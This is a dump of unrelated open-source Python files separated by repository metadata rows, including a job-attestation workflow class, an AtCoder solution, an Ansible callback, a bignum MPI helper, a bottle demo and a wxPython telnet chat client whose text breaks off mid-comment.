# Data loading.
def loadInstance(self):
if self.getIsLoaded():
return
self.setIsLoaded(True)
if not self.getIsEnabled():
return
jobTask = self.getPrimaryJobTaskDict()
if jobTask:
resultDict = attestSvc.AttestService(self.getWorkflow().getConnection()).getAttestation(jobTask.get('id',0))
if resultDict:
self.setAttestation(resultDict)
# Directive emails.
def extendEmailContext(self, _emailContext):
# Add/Change elements in the given _emailContext.
env = envUtils.getEnvironment()
appCode = env.getAppCode()
loginURI = env.getLoginUri()
siteApplications = self.getWorkflow().getUserProfile().get('siteProfile',{}).get('siteApplications',[])
urlPrefix = env.getApplicationURLPrefix(appCode, siteApplications)
externalKey = self.getWorkflow().getJobActionDict().get('external_key', '')
_emailContext['candidate_url'] = "%s%s/%s" % (urlPrefix, loginURI, externalKey)
# Everything else.
def getDataDict(self, _sitePreferences):
self.loadInstance()
if self.getIsEnabled():
prefix = '/appt/jobaction/attest'
jobActionIdStr = str(self.getWorkflow().getJobActionDict().get('id',0))
argTuple = (prefix, jobActionIdStr, self.getCode())
dataDict = {}
dataDict['url'] = '%s/%s/%s' % argTuple
dataDict['disabled'] = self.standardTaskDisabledCheck()
return dataDict
return {}
def getEditContext(self, _sitePreferences,isForPrint = False):
self.loadInstance()
if self.getIsEnabled():
context = self.getCommonEditContext(_sitePreferences)
context['url'] = self._getURL()
context['enable_print'] = self.getConfigDict().get('print_enabled',True)
context['button_text'] = 'Submit'
context['button_url'] = self._getURL('/appt/jobaction/attest/complete')
context['print_url'] = self._getURL('/appt/jobaction/attest/print')
context['prompts'] = self.dictifyPromptsList(self.getConfigDict().get('prompts',{}))
context.update(self.updateContextWithImage(self.getConfigDict().get('displayImage',False),
self.getConfigDict().get('displayImageScalePixelWidth',400),
self.getConfigDict().get('displayImageTaskCode',''),
isForPrint))
# the old way, left here for backward compatibility
# on new templates, use {tags} below
fullName = ''
candidate = jaService.JobActionService(self.getWorkflow().getConnection()).getCandidateDict(self.getWorkflow().getJobActionDict())
if candidate:
fullName = candidate.get('full_name')
context['candidate_name'] = fullName
context['submitText'] = self.getConfigDict().get('submitText','')
if '%s' in context['submitText']:
context['submitText'] = context['submitText'] % fullName.upper()
else:
# the new way, allows for a candidate or a system user to attest
if self._attestationDict.has_key('attestor_department'):
attestor_department = self._attestationDict.get('attestor_department','')
attestor_name = self._attestationDict.get('attestor_name','')
else:
attestor_name,attestor_department = self.getNameAndDepartment()
submitText = str(context['submitText'])
if submitText.find('{attestor_department}') > -1:
submitText=submitText.replace('{attestor_department}',attestor_department)
if submitText.find('{attestor_name}') > -1:
submitText=submitText.replace('{attestor_name}',attestor_name)
context['submitText'] = submitText
configKeyName = 'uberGapsConfig'
uberGapsConfig = self.getConfigDict().get(configKeyName, [])
if uberGapsConfig:
gapSoivice = uberGapSvc.UberGapService(self.getWorkflow().getConnection())
gaps = gapSoivice.processContainer(self, _sitePreferences, _configKeyName=configKeyName, _returnLocalizedDates=True)
if gaps:
context['gapsList'] = gaps
context['gapsEnforced'] = self.getConfigDict().get('uberGapsEnforced', True)
context['gapsEnforcedDescr'] = self.getConfigDict().get('uberGapsEnforcedText', '')
context['gapsPrintIntroText'] = self.getConfigDict().get('uberGapsPrintIntroText', '')
if context['gapsEnforced']:
context['disabled'] = True
return context
return {}
def getNameAndDepartment(self):
attestor_name = ''
isCandidate = self.hasPermission('apptCandidate')
if not isCandidate:
attestor_name = self.workflow.userProfile.get('userProfile',{}).get('userPreferences',{}).get('full_name''')
else:
candidate = jaService.JobActionService(self.workflow.connection).getCandidateDict(self.workflow.getJobActionDict())
if candidate:
attestor_name = candidate.get('full_name')
attestor_department = self.workflow.department.get('full_descr','')
return attestor_name.upper(),attestor_department.upper()
def _getURL(self, _prefix='/appt/jobaction/attest'):
jobActionIdStr = str(self.getWorkflow().getJobActionDict().get('id',0))
return '%s/%s/%s' % (_prefix, jobActionIdStr, self.getCode())
def isComplete(self):
self.loadInstance()
if self.getIsEnabled():
return self.getAttestation().get('complete', False)
return True
| [
"[email protected]"
] | |
6d167be378b64da8b761152a806b3267181938ac | a9f7e40e18c935fb004fe813f98e298ded0581af | /Unrated/NIKKEI_2019_Ex/NIKKEI_2019_Ex-G.py | 91c77f85fafefd28a617a6781617c33d96188fea | [] | no_license | happa64/AtCoder_Beginner_Contest | 2eb350f500f4bd65f5491b98cdf002ac9b174165 | 2526e72de9eb19d1e1c634dbd577816bfe39bc10 | refs/heads/master | 2023-07-08T15:13:51.449555 | 2021-08-11T14:18:09 | 2021-08-11T14:18:09 | 255,601,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | # https://atcoder.jp/contests/nikkei2019-ex/submissions/18385907
# G - 回文スコア
import sys
from collections import Counter
sys.setrecursionlimit(10 ** 7)
f_inf = float('inf')
mod = 10 ** 9 + 7
def resolve():
    """Read a string S from stdin and print the maximum palindrome score.

    Characters with even counts (and the even part of odd counts) can be
    paired into one long palindrome worth (length)^2; leftover singletons
    each add 1, except one singleton may join the big palindrome as its
    centre, making it (length + 1)^2.
    """
    text = input()
    frequency = Counter(text)
    paired = 0      # total characters usable in symmetric pairs
    singles = 0     # characters left over after pairing (one per odd count)
    for count in frequency.values():
        if count % 2 == 0:
            paired += count
        else:
            paired += count - 1   # count - 1 is 0 when count == 1
            singles += 1
    if singles:
        # One leftover becomes the palindrome centre; the rest score 1 each.
        answer = (paired + 1) ** 2 + (singles - 1)
    else:
        answer = paired ** 2
    print(answer)
# Script entry point: read the problem input and print the answer.
if __name__ == '__main__':
    resolve()
| [
"[email protected]"
] | |
98a0437b02ec91f9eb46d2cdc1a194709887c950 | ba9c4be2697d5299fee7adf1652152f92e789894 | /__init__.py | 37fc40a9722c542c9e6a902b473a04d95ad62b34 | [] | no_license | fabyc/nodux_in_invoice2note | 8ec180a585f83d732c8819d21454403d6639c3e3 | 5b2fb6548149c0ace5cfc2c8a56237c1c372fb0b | refs/heads/master | 2022-05-27T09:26:43.844978 | 2017-08-16T20:14:55 | 2017-08-16T20:14:55 | 260,091,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #This file is part of Tryton. The COPYRIGHT file at the top level of
#this repository contains the full copyright notices and license terms.
from trytond.pool import Pool
from .invoice import *
def register():
    """Register this module's model classes in the Tryton pool."""
    Pool.register(
        Invoice,
        module='nodux_in_invoice2note', type_='model')
| [
"[email protected]"
] | |
24848acbed36d1b8123122e0ce4c169f45274050 | ee0b9cd2424e634a212a6d9734af1eaedd40dfe0 | /jhub37_mantid_baseline/sasview-5.0.3/src/sas/qtgui/Plotting/SlicerModel.py | fcff73897d0b797ce5523cb2234f937919a6e72b | [
"BSD-3-Clause"
] | permissive | moving-northwards/Docker | 775755b4618c1a7946f540505b0178e119d294d1 | 8ef18fd8c6abb0608ce9b53187e53d00d3e4e9ae | refs/heads/master | 2023-05-26T08:42:58.634525 | 2021-06-15T08:41:08 | 2021-06-15T08:41:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,547 | py | from PyQt5 import QtGui
from PyQt5 import QtCore
import sas.qtgui.Utilities.GuiUtils as GuiUtils
class SlicerModel(object):
    """Mixin that mirrors slicer parameters in a QStandardItemModel.

    Subclasses must implement getParams(), setParams() and validate().
    The two-column model (Parameter / Value) is kept in sync with the
    parameter dictionary in both directions.
    """
    def __init__(self):
        # Model representation of local parameters
        self._model = QtGui.QStandardItemModel()
        # Guard flag: set to False while a model-driven parameter write is in
        # flight, so implementations can avoid rebuilding the model reentrantly.
        self.update_model = True
        self._model.itemChanged.connect(self.setParamsFromModelItem)

    def setModelFromParams(self):
        """
        Set up the Qt model for data handling between controls
        """
        parameters = self.getParams()
        self._model.removeRows(0, self._model.rowCount())
        # Create/overwrite model items
        for parameter in list(parameters.keys()):
            item1 = QtGui.QStandardItem(parameter)
            item2 = QtGui.QStandardItem(GuiUtils.formatNumber(parameters[parameter]))
            self._model.appendRow([item1, item2])
        self._model.setHeaderData(0, QtCore.Qt.Horizontal, "Parameter")
        self._model.setHeaderData(1, QtCore.Qt.Horizontal, "Value")

    def setParamsFromModel(self):
        """
        Set up the params dictionary based on the current model content.
        """
        params = self.getParams()
        for row_index in range(self._model.rowCount()):
            param_name = str(self._model.item(row_index, 0).text())
            params[param_name] = float(self._model.item(row_index, 1).text())
        self.update_model = False
        self.setParams(params)
        self.update_model = True

    def setParamsFromModelItem(self, item):
        """
        Set up the params dictionary for the parameter in item.
        """
        params = self.getParams()
        row_index = self._model.indexFromItem(item).row()
        param_name = str(self._model.item(row_index, 0).text())
        params[param_name] = float(self._model.item(row_index, 1).text())
        self.update_model = False
        self.setParams(params)
        self.update_model = True

    def model(self):
        '''getter for the model'''
        return self._model

    def getParams(self):
        '''Pure virtual: return the slicer parameter dictionary.'''
        raise NotImplementedError("Parameter getter must be implemented in derived class.")

    def setParams(self, params):
        '''Pure virtual: apply the given parameter dictionary.

        Accepts the dictionary argument (internal callers always pass one)
        so a missing override fails with NotImplementedError rather than a
        confusing TypeError about argument counts.
        '''
        raise NotImplementedError("Parameter setter must be implemented in derived class.")

    def validate(self):
        '''Pure virtual: validate the current parameters.'''
        raise NotImplementedError("Validator must be implemented in derived class.")
| [
"[email protected]"
] | |
b34ec6fea05408a0f8b07b708fd7b9eb9aff1f36 | 54b8fa244ff0dae2018efedcb81e1bb03376e5e2 | /test/functional/test_framework/bignum.py | 5af132b8a1480c8b1b2ec58ba88da0a3e971c468 | [
"MIT"
] | permissive | afghany/castletmp | e15677a88f9a1878486b6becf93d26c0ee9dbeaf | 9d0daed2a6abaf7d93f9308f5c602db6eeb42c8b | refs/heads/master | 2022-11-27T14:58:47.802781 | 2020-08-08T21:26:12 | 2020-08-08T21:26:12 | 284,464,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,913 | py | #!/usr/bin/env python3
#
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Big number routines.
This file is copied from python-bitcoinlib.
"""
import struct
# generic big endian MPI format
def bn_bytes(v, have_ext=False):
    """Number of bytes needed to hold integer v, plus one pad byte if have_ext."""
    extra = 1 if have_ext else 0
    return (v.bit_length() + 7) // 8 + extra
def bn2bin(v):
    """Serialize a non-negative integer to big-endian bytes (no sign handling)."""
    out = bytearray()
    for shift in range(bn_bytes(v) - 1, -1, -1):
        out.append((v >> (shift * 8)) & 0xff)
    return out
def bin2bn(s):
    """Deserialize big-endian bytes to a non-negative integer."""
    return int.from_bytes(bytes(s), 'big')
def bn2mpi(v):
    """Serialize an integer in OpenSSL big-endian MPI format.

    Layout: 4-byte big-endian payload length, then the magnitude bytes.
    The high bit of the first payload byte carries the sign, so a zero
    pad byte is prepended whenever the magnitude's top bit is set.
    """
    negative = v < 0
    magnitude = -v if negative else v
    bits = magnitude.bit_length()
    # Pad when the magnitude exactly fills its bytes (top bit would collide
    # with the sign flag).
    pad = bits > 0 and bits % 8 == 0
    header = struct.pack(b">I", bn_bytes(magnitude, pad))
    payload = (bytearray([0]) if pad else bytearray()) + bn2bin(magnitude)
    if negative:
        payload[0] |= 0x80
    return header + payload
def mpi2bn(s):
    """Parse an OpenSSL MPI-encoded buffer back into an integer.

    Returns None when the buffer is malformed (too short or the declared
    payload length does not match).
    """
    if len(s) < 4:
        return None
    (payload_len,) = struct.unpack(b">I", bytes(s[:4]))
    if len(s) != payload_len + 4:
        return None
    if payload_len == 0:
        return 0
    payload = bytearray(s[4:])
    # The top bit of the first payload byte is the sign flag.
    negative = bool(payload[0] & 0x80)
    payload[0] &= 0x7f
    value = bin2bn(payload)
    return -value if negative else value
# castle-specific little endian format, with implicit size
def mpi2vch(s):
    """Convert an MPI buffer to little-endian vch: drop the 4-byte size, reverse."""
    return s[4:][::-1]
def bn2vch(v):
    """Serialize integer v to the little-endian vch format used in scripts."""
    return bytes(mpi2vch(bn2mpi(v)))
def vch2mpi(s):
    """Convert little-endian vch data to MPI: prepend a 4-byte size, reverse to BE."""
    return struct.pack(b">I", len(s)) + s[::-1]
def vch2bn(s):
    """Parse little-endian vch data back into an integer."""
    return mpi2bn(vch2mpi(s))
| [
"[email protected]"
] | |
d2fbd07c92fe745b47740d4e7405fae4d80d92f0 | a1bffcd8854e1843e56bb812d4d83b3161a5211e | /plugins/callback/oneline.py | 2e5d07c5de90f3cd6d0c6d71b3ec59da0414ebd9 | [] | no_license | goneri/ansible.community | 1a71f9d98c164b77f8ed2ed7f558b4963005ff8f | f26f612dd0a3154050d90b51a75502018c95f6e4 | refs/heads/master | 2020-12-29T07:47:35.353515 | 2020-01-22T17:43:18 | 2020-01-22T17:43:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,520 | py | # (c) 2012-2014, Michael DeHaan <[email protected]>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: oneline
type: stdout
short_description: oneline Ansible screen output
description:
- This is the output callback used by the -o/--one-line command line option.
'''
from ansible.plugins.callback import CallbackBase
from ansible import constants as C
class CallbackModule(CallbackBase):

    '''
    Stdout callback that condenses every task result onto a single line,
    mirroring the behaviour of the -o/--one-line command line option.
    '''

    CALLBACK_VERSION = 2.0
    CALLBACK_TYPE = 'stdout'
    CALLBACK_NAME = 'ansible.community.oneline'

    def _command_generic_msg(self, hostname, result, caption):
        '''Flatten a raw command result into one "host | caption | rc | output" line.'''
        def _flat(text):
            return text.replace('\n', '\\n').replace('\r', '\\r')

        rc = result.get('rc', -1)
        stdout = _flat(result.get('stdout', ''))
        if result.get('stderr'):
            stderr = _flat(result.get('stderr', ''))
            return "%s | %s | rc=%s | (stdout) %s (stderr) %s" % (hostname, caption, rc, stdout, stderr)
        return "%s | %s | rc=%s | (stdout) %s" % (hostname, caption, rc, stdout)

    def v2_runner_on_failed(self, result, ignore_errors=False):
        '''Report a failed task, summarising any captured traceback per verbosity.'''
        if 'exception' in result._result:
            traceback_text = result._result['exception']
            if self._display.verbosity < 3:
                # Only surface the final line of the traceback (the error itself).
                last_line = traceback_text.strip().split('\n')[-1]
                msg = "An exception occurred during task execution. To see the full traceback, use -vvv. The error was: %s" % last_line
            else:
                msg = "An exception occurred during task execution. The full traceback is:\n" + traceback_text.replace('\n', '')

            if result._task.action in C.MODULE_NO_JSON and 'module_stderr' not in result._result:
                self._display.display(self._command_generic_msg(result._host.get_name(), result._result, 'FAILED'), color=C.COLOR_ERROR)
            else:
                self._display.display(msg, color=C.COLOR_ERROR)

        self._display.display("%s | FAILED! => %s" % (result._host.get_name(), self._dump_results(result._result, indent=0).replace('\n', '')),
                              color=C.COLOR_ERROR)

    def v2_runner_on_ok(self, result):
        '''Report a successful task as SUCCESS or CHANGED.'''
        changed = result._result.get('changed', False)
        color = C.COLOR_CHANGED if changed else C.COLOR_OK
        state = 'CHANGED' if changed else 'SUCCESS'

        if result._task.action in C.MODULE_NO_JSON and 'ansible_job_id' not in result._result:
            self._display.display(self._command_generic_msg(result._host.get_name(), result._result, state), color=color)
        else:
            self._display.display("%s | %s => %s" % (result._host.get_name(), state, self._dump_results(result._result, indent=0).replace('\n', '')),
                                  color=color)

    def v2_runner_on_unreachable(self, result):
        '''Report a host that could not be reached.'''
        self._display.display("%s | UNREACHABLE!: %s" % (result._host.get_name(), result._result.get('msg', '')), color=C.COLOR_UNREACHABLE)

    def v2_runner_on_skipped(self, result):
        '''Report a skipped task.'''
        self._display.display("%s | SKIPPED" % (result._host.get_name()), color=C.COLOR_SKIP)
| [
"[email protected]"
] | |
b43c93f012b04f452b69ddcc2add80dc65a7ac0a | 588f4991cad99f517ca5028e0e41c5b4d5252543 | /contest/abc128/C.py | d515f27cb54e9ca99721b1cfb2e8eefcf66a93e6 | [
"MIT"
] | permissive | mola1129/atcoder | 3002ff38cabf0ccb5142bd576ed90419fccde02e | 1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db | refs/heads/master | 2020-06-16T12:24:49.609707 | 2020-03-14T15:58:42 | 2020-03-14T15:58:42 | 195,571,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | N,M = map(int, input().split())
connect = [[0,0,0]]
on_off = [0]*(N+1)
result = 0
for _ in range(M):
k = list(map(int, input().split()))
connect.append(k[1:])
p = list(map(int, input().split()))
for cnt in range(0,2**N):
bin_str = list(format(cnt, 'b'))
i = len(on_off)-len(bin_str)
for num in bin_str:
on_off[i] = int(num)
i += 1
for i in range(1,M+1):
total = 0
for j in connect[i]:
total += on_off[j]
if total % 2 != p[i-1]:
break
elif i == M:
result += 1
print(result)
| [
"[email protected]"
] | |
02bebd325a4f76630ff5661c2d8ce5290d849fec | 6f0ceee714bccf2a89c34a06aabd3bcb781a2fa4 | /python/mxnet/gluon/probability/distributions/chi2.py | 7b74683cb09c074f9ac0c521dbf91f8135d864c2 | [
"Apache-2.0",
"MIT",
"Unlicense",
"BSL-1.0",
"NCSA",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause",
"OFL-1.0",
"BSD-2-Clause-Views",
"Zlib"
] | permissive | yajiedesign/mxnet | 5a495fd06dd1730c17d2d27d7e46c8a770847f17 | 8e5a16cf673db5aceb48d2cf7a0fc1abd0ee5e51 | refs/heads/master | 2021-03-30T22:37:18.603396 | 2020-10-23T06:40:17 | 2020-10-23T06:40:17 | 43,763,550 | 214 | 59 | Apache-2.0 | 2020-06-01T23:31:15 | 2015-10-06T16:36:40 | C++ | UTF-8 | Python | false | false | 1,620 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import
"""Chi-sqaure distribution"""
__all__ = ['Chi2']
from .gamma import Gamma
from .constraint import Positive
class Chi2(Gamma):
    r"""Create a Chi2 distribution object.
    Chi2(df) is equivalent to Gamma(shape=df / 2, scale=2)
    Parameters
    ----------
    df : Tensor or scalar
        Degrees of freedom (the shape parameter) of the distribution.
        Must be positive; there is no default.
    F : mx.ndarray or mx.symbol.numpy._Symbol or None
        Variable recording running mode, will be automatically
        inferred from parameters if declared None.
    """
    # pylint: disable=abstract-method
    arg_constraints = {'df': Positive()}
    def __init__(self, df, F=None, validate_args=None):
        super(Chi2, self).__init__(df / 2, 2, F, validate_args)
    @property
    def df(self):
        # Recover degrees of freedom from the underlying Gamma shape (df = 2 * shape).
        return self.shape * 2
| [
"[email protected]"
] | |
9e9f021e5c2d6c9d246028e2905aa22f9a704361 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R3/benchmark/startPyquil254.py | ae770cd6c05beda2d5d3a22c59f0cde3c69686d1 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | # qubit number=4
# total number=14
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
    """Build the fixed 4-qubit pyquil test program (14 gates).

    The gate sequence is the benchmark itself, so the order must not be
    changed; the trailing "number=" comments index each gate.
    """
    prog = Program() # circuit begin
    prog += H(0) # number=1
    prog += H(1) # number=2
    prog += H(2) # number=3
    prog += CNOT(0,2) # number=11
    prog += X(2) # number=12
    prog += CNOT(0,2) # number=13
    prog += H(3) # number=4
    prog += Y(3) # number=5
    prog += SWAP(1,0) # number=7
    prog += SWAP(1,0) # number=8
    prog += Y(0) # number=9
    prog += Y(0) # number=10
    # circuit end

    return prog
def summrise_results(bitstrings) -> dict:
    """Count occurrences of each bitstring.

    (The misspelled name is kept for call-site compatibility.)

    :param bitstrings: iterable of measurement bitstrings
    :return: dict mapping bitstring -> occurrence count
    """
    counts = {}
    for bits in bitstrings:
        # Single lookup with a default instead of the get-then-test pattern.
        counts[bits] = counts.get(bits, 0) + 1
    return counts
if __name__ == '__main__':
    prog = make_circuit()
    qvm = get_qc('4q-qvm')

    # Sample the circuit 1024 times on a 4-qubit QVM.
    results = qvm.run_and_measure(prog,1024)
    # Transpose the per-qubit sample arrays into per-shot rows.
    bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
    bitstrings = [''.join(map(str, l)) for l in bitstrings]
    # Write the aggregated counts to the shared results file.
    writefile = open("../data/startPyquil254.csv","w")
    print(summrise_results(bitstrings),file=writefile)
    writefile.close()
| [
"[email protected]"
] | |
3ce1c4f46a991d070a0f622b26e7320bd65e0cc6 | bc6492a9a30ac7228caad91643d58653b49ab9e3 | /sympy/series/benchmarks/bench_limit.py | 06fd12c97e72d64b577dd4d469f61cc9efec5885 | [] | no_license | cosmosZhou/sagemath | 2c54ea04868882340c7ef981b7f499fb205095c9 | 0608b946174e86182c6d35d126cd89d819d1d0b8 | refs/heads/master | 2023-01-06T07:31:37.546716 | 2020-11-12T06:39:22 | 2020-11-12T06:39:22 | 311,177,322 | 1 | 0 | null | 2020-11-12T06:09:11 | 2020-11-08T23:42:40 | Python | UTF-8 | Python | false | false | 158 | py | from __future__ import print_function, division
from sympy import Symbol, limit, oo
x = Symbol('x')
def timeit_limit_1x():
limit(1/x, x, oo)
| [
"[email protected]"
] | |
8d4245bbcb13287d8470f9f637b1762b06d211ae | 8b0267e7e1ac5b7e762f705597406ef2673b4755 | /segmentation/smp_local/encoders/__init__.py | 1665d2724b70bfe72329ee64151569ccf99dd2c2 | [] | no_license | jionie/Ultra-high-Resolution-EM-Images-Segmentation | f2f33cb8c279ca698abb49cee2fd6872fbf66df0 | b4389349e42310288bbc8704cdbdea6825598d8f | refs/heads/master | 2020-09-19T12:12:57.260517 | 2019-12-18T09:00:43 | 2019-12-18T09:00:43 | 224,227,599 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | import functools
import torch.utils.model_zoo as model_zoo
from .resnet import resnet_encoders
from .dpn import dpn_encoders
from .vgg import vgg_encoders
from .senet import senet_encoders
from .densenet import densenet_encoders
from .inceptionresnetv2 import inceptionresnetv2_encoders
from .inceptionv4 import inceptionv4_encoders
from .efficientnet import efficient_net_encoders
from ._preprocessing import preprocess_input
# Global registry mapping encoder name -> spec dict ('encoder' class,
# 'params', 'out_shapes', 'pretrained_settings'), merged from every family.
encoders = {}
encoders.update(resnet_encoders)
encoders.update(dpn_encoders)
encoders.update(vgg_encoders)
encoders.update(senet_encoders)
encoders.update(densenet_encoders)
encoders.update(inceptionresnetv2_encoders)
encoders.update(inceptionv4_encoders)
encoders.update(efficient_net_encoders)
def get_encoder(name, encoder_weights=None):
    """Instantiate a backbone encoder by name, optionally loading pretrained weights."""
    spec = encoders[name]
    encoder = spec['encoder'](**spec['params'])
    encoder.out_shapes = spec['out_shapes']

    if encoder_weights is not None:
        weight_url = spec['pretrained_settings'][encoder_weights]['url']
        encoder.load_state_dict(model_zoo.load_url(weight_url))

    return encoder
def get_encoder_names():
    """Return the names of all registered encoders."""
    return [*encoders]
def get_preprocessing_params(encoder_name, pretrained='imagenet'):
    """Return input-normalisation parameters for an encoder/pretraining combo.

    :param encoder_name: key into the global ``encoders`` registry
    :param pretrained: which pretrained-settings entry to use
    :raises ValueError: if ``pretrained`` is not available for this encoder
    :return: dict with 'input_space', 'input_range', 'mean', 'std'
    """
    settings = encoders[encoder_name]['pretrained_settings']

    if pretrained not in settings:
        # Typo fix: "Avaliable" -> "Available" in the user-facing message.
        raise ValueError('Available pretrained options {}'.format(settings.keys()))

    source = settings[pretrained]
    return {key: source.get(key) for key in ('input_space', 'input_range', 'mean', 'std')}
return formatted_settings
def get_preprocessing_fn(encoder_name, pretrained='imagenet'):
    """Return a preprocessing callable bound to the encoder's normalisation params."""
    params = get_preprocessing_params(encoder_name, pretrained=pretrained)
    return functools.partial(preprocess_input, **params)
| [
"[email protected]"
] | |
dc993c018a89e7c21f48d7f0f3123050933aa7fe | 6ddd74b228cebf0a09be584611e914391725f778 | /readsource/bottle/bottlefirst.py | 37bd284af1be0fdd350ea595a37880f4a4e1f569 | [] | no_license | kekefeng/gitproject | 98435b89ae5bdc63ceed3981438ec3041927da87 | 920c0791e8db69b27d5cffc76c9dd8f90ca2525e | refs/heads/master | 2020-04-22T03:26:00.135817 | 2019-03-18T04:58:06 | 2019-03-18T04:58:06 | 170,086,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | from bottle import Bottle, run, template, route
app = Bottle()
# Earlier experiment kept for reference: regex filter plus an int id segment.
#@app.route('/hello/<name:re:[a-z]+>/zzx/kk/<id:int>')
@app.route('/hello/<name:int>')
def greet(name='Stranger'):
    # The :int route filter converts the URL segment, so the 'Stranger'
    # default only applies when greet() is called directly in code.
    return template('Hello {{name}}, how are you?', name=name)
run(app, host='localhost', port=5000, server='wsgiref')
| [
"[email protected]"
] | |
557a7f5b19846ab4ef99b079dc66bebd3ca574d5 | f3af143bada7f79db1e15b4386e5107bc99eb212 | /ProjectBaseTest1/工具练习/10-文字聊天室/client.py | 70ba7d7f25e6fa1e4bf62d351835bf7540105b10 | [] | no_license | xxxfly/PythonStudy | a5ceae1d2b16cfdba19871507458154fc292bca0 | 478d89ccefc91a84f935aebdca796c9d4c23ef61 | refs/heads/master | 2022-04-08T13:45:03.405768 | 2020-03-09T03:47:50 | 2020-03-09T03:47:50 | 45,187,749 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,604 | py | #-*-coding:utf-8-*-
import wx
import telnetlib
from time import sleep
import _thread as thread
import random
import re
class LoginFrame(wx.Frame):
    """
    Login window: collects the server address and user name, then connects
    over the module-level Telnet connection.
    """
    def __init__(self,parent,id,title,size):
        # Initialize the frame, create the widgets and bind events.
        wx.Frame.__init__(self,parent,id,title)
        self.SetSize(size)
        self.Center()
        self.serverAddressLable=wx.StaticText(self,label="Server Address",pos=(10,50),size=(120,25))
        self.userNameLabel=wx.StaticText(self,label="UserName",pos=(40,100),size=(120,25))
        self.serverAddress=wx.TextCtrl(self,pos=(120,47),size=(150,25))
        self.userName=wx.TextCtrl(self,pos=(120,97),size=(150,25))
        self.loginButton=wx.Button(self,label="Login",pos=(80,145),size=(130,30))

        # Bind the login handler.
        self.loginButton.Bind(wx.EVT_BUTTON,self.login)
        self.Show()

    def login(self,event):
        # Handle a login attempt against the chat server.
        try:
            serverAddress=self.serverAddress.GetLineText(0).split(':')
            address=serverAddress[0]
            port=serverAddress[1]
            con.open(address,port=int(port),timeout=10)
            response=con.read_some()
            if response!=b'Connect Success':
                self.showDialog('Error','Connect Fail',(200,100))
                return
            con.write(('login '+str(self.userName.GetLineText(0))+'\n').encode('utf-8'))
            response=con.read_some()
            if response==b'UserName Empty':
                self.showDialog('Error','UserName Empty!',(200,100))
            elif response==b'UserName Exists':
                # BUGFIX: this branch previously re-tested b'UserName Empty',
                # which made the "UserName Exists!" dialog unreachable.
                # NOTE(review): assumes the server replies b'UserName Exists'
                # for duplicate names — confirm against the server code.
                self.showDialog('Error','UserName Exists!',(200,100))
            else:
                self.Close()
                ChatFrame(None,2,title='Chat Client',size=(500,400))
        except Exception as ex:
            print(str(ex))
            self.showDialog('Error','Connect Fail!',(95,20))

    def showDialog(self,title,content,size):
        # Show a modal error dialog with the given message.
        print('Error:'+content)
        dialog=wx.Dialog(self,title=title,size=size)
        dialog.Center()
        wx.StaticText(dialog,label=content)
        dialog.ShowModal()
dialog.ShowModal()
class ChatFrame(wx.Frame):
    """
    Chat window: sends commands over the shared Telnet connection and shows
    incoming messages, polled by a background thread.
    """
    def __init__(self,parent,id,title,size):
        # Initialize the frame, create the widgets and bind events.
        wx.Frame.__init__(self,parent,id,title)
        self.SetSize(size)
        self.Center()
        self.chatFrame=wx.TextCtrl(self,pos=(5,5),size=(490,310),style=wx.TE_MULTILINE|wx.TE_READONLY)
        self.message = wx.TextCtrl(self, pos=(5, 320), size=(300, 25))
        self.sendButton=wx.Button(self,label='Send',pos=(310,320),size=(58,25))
        self.usersButton=wx.Button(self,label='Users',pos=(373,320),size=(58,25))
        self.closeButton=wx.Button(self,label='Close',pos=(436,320),size=(58,25))
        # Send button: post the typed message.
        self.sendButton.Bind(wx.EVT_BUTTON,self.send)
        # Users button: request the list of online users.
        self.usersButton.Bind(wx.EVT_BUTTON,self.lookUsers)
        # Close button: log out and close the window.
        self.closeButton.Bind(wx.EVT_BUTTON,self.close)
        # Poll the server for messages on a background thread.
        thread.start_new_thread(self.receive,())
        self.Show()

    def send(self,event):
        # Send the typed message to the server.
        message=str(self.message.GetLineText(0)).strip()
        if message!='':
            con.write(('say '+message+'\n').encode('utf-8'))
            self.message.Clear()

    def lookUsers(self,event):
        # Ask the server how many users are online.
        con.write(b'look\n')

    def close(self,event):
        # Log out, drop the connection and close the window.
        con.write(b'logout\n')
        con.close()
        self.Close()

    def receive(self):
        # Background loop: poll the server and append any received text.
        while True:
            sleep(0.6)
            result=con.read_very_eager()
            # BUGFIX: read_very_eager() returns bytes, so the previous test
            # `result != ''` compared bytes to str and was always true,
